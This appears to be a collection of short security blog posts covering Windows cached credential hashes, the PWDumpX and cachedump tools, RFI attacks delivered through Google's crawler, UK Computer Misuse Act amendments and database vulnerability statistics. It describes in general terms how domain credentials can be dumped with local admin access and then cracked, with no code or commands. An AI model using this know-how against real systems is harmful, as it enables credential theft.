hmm looks like it's not quite as bad as I thought it was. After a bit more reading on the subject, the windows cached password is not just an NTLM hash, it's actually a salted hash, with the salt being the username.
So rainbow tables aren't really a practical attack for this, although it's interesting to note that there's a John the ripper plug-in for cachedump now which enables you to do dictionary based/brute-force attacks on retrieved credentials
A listing of some cool looking security tools. In particular, I think that PWDumpX could be an interesting one.
I've not had a chance to play with it yet, but it seems to me that the implication of it is that in an enterprise environment, if you have access to a local admin set of credentials (which depending on how your company manages local admin accounts may be pretty easy) or if your domain account has local admin, you could use this tool to dump the domain credentials of any user by running this against the machine that they're logged in to. Of course, once you've got the credentials you need to decrypt them, but then, that's what rainbow tables are for!
If it works like that it's actually a pretty sneaky attack, definitely one to test.
SecuriTeam Blogs » Anonymizing RFI Attacks Through Google
Interesting post at the Securiteam blog, giving some more details on the idea of using google to hack for you by causing it to spider links which contain exploits.
Of course in addition to the RFI (remote file inclusion) vulnerabilities they're talking about, it would be possible to do SQL injection this way, although you'd need to either understand the app well before the attack or leave footprints all over the site as you work out the correct injection string.
As the comments on the blog point out, this isn't a new attack, but there is some good detail including solid information about this being exploited in the wild, which is interesting as I wasn't aware of it as anything more than a concept...
I wonder how long it is before someone tries to sue Google for "hacking their site" !
There are some amendments in the new Police and Justice Act to the Computer Misuse Act and some of them do not sound like good news for the UK Penetration testing & Security Research community.
Looking at Section 37 of the Act you get this
(1) A person is guilty of an offence if he makes, adapts, supplies or offers
to supply any article intending it to be used to commit, or to assist in
the commission of, an offence under section 1 or 3.
(2) A person is guilty of an offence if he supplies or offers to supply any
article believing that it is likely to be used to commit, or to assist in the
commission of, an offence under section 1 or 3.
(3) A person is guilty of an offence if he obtains any article with a view to
its being supplied for use to commit, or to assist in the commission of,
an offence under section 1 or 3.
(Offences in section 1 or 3 is basically unauthorised access to computer resources).
To my mind that leaves people publishing exploit code in the UK in serious trouble along with anyone selling or making open source Penetration testing software. It'd would be pretty hard to argue that you didn't believe it was likely that a tool that could be used for Pen testing could also be used by someone to break into a system, as the only thing that's really different is the intent !
The act also covers DoS (or reckless impairment of the operation of a computer as the act calls it) so would it follow that software which stress tests systems would also fall foul of the act?
I expect that what'll happen is that we'll get some chat from government officials that "legitimate security professionals won't be targeted" but I for one really don't like the idea that I could be committing an offence and I'm relying on someones definition of "legitimate" to avoid being prosecuted!
There's some more data on comparing Oracle and MS SQL server vulnerability levels over at michael Howards blog.
There's a link to a study by David Litchfield on the numbers here which pretty much comes to a similar conclusion to looking at the secunia numbers, but does a more accurate job of analysing the findings by looking at a number of sources.
The clear point to be made is that Microsoft have done a very good job on the security of MS SQL server 2005 and if someone were to ask me about a choice between these two "enterprise database" vendors in terms of security, it would be a bit of a no-brainer!
One thing you can see is that this study, whilst still coming to the same conclusion (that MS SQL server is more secure than Oracle) actually has quite different numbers from the ESG study that was quoted in Michael's earlier blog posting here
At a rough count the NGS paper lists ~58 MS SQL vulnerabilities whilst the ESG one lists less than 10 (there's no background data so it's kinda hard to tell), and a similar story for the Oracle one with well over a hundred in the NGS paper and only 70 in the ESG one.
IMO a good reason to actually dig a bit deeper on these things rather than go with something like CVE which isn't really designed for the purpose. The same result has come out but by being able to see what's being counted it becomes more believable and less likely to have people be able to argue the stats....
There's a post over at Michael Howards Blog about a study showing that Microsoft SQL Server has a better security record than Oracle or MySQL.
Whilst I agree with the overall point, SQL server (especially 2005) is waay better than Oracle/MySQL on the security front, the numbers this study uses seem odd..
They've not specified product version and that's just going to make the numbers very odd, they've also not (that I can see) specified their exact methodology the comment above implies that their methodology may not be the best!
Here's a better (IMO) analysis, using secunia which actually breaks things down well by product
Number of advisories per product from 2003-2006
Microsoft SQL Server 2000 - 10
Microsoft SQL Server 2005 - 0
MySQL 3 - 11
MySQL 4 - 19
MySQL 5 - 5
Oracle 8i - 17
Oracle 9i Enterprise - 23
Oracle 10g - 13
Now I know it's possible to argue the point around severity etc and product age, but I'd say still a pretty clear win for Microsoft...
